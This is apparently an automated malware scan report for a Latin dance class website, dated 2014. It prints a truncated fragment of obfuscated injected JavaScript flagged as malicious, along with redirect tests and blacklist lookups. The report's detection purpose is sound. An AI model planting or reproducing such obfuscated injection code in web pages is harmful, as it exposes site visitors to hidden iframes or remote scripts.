Scanned pages/files
Request | Server response | Status |
http://latindanceclassesonline.com/ | 200 OK Content-Length: 5451 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$){d="(@(){ %H=@( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&a Antivirus reports:
| ||
http://latindanceclassesonline.com/test404page.js | 404 Not Found Content-Length: 52 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: latindanceclassesonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 11:23:36 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 5451
Content-Type: text/html
...5451 bytes of data.
GET / HTTP/1.1
Host: latindanceclassesonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 11:23:36 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 5451
Content-Type: text/html
...5451 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: latindanceclassesonline.com
Referer: http://www.google.com/search?q=latindanceclassesonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: latindanceclassesonline.com
Referer: http://www.google.com/search?q=latindanceclassesonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=latindanceclassesonline.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://latindanceclassesonline.com/
Result: latindanceclassesonline.com is not infected or malware details are not published yet.
Result: latindanceclassesonline.com is not infected or malware details are not published yet.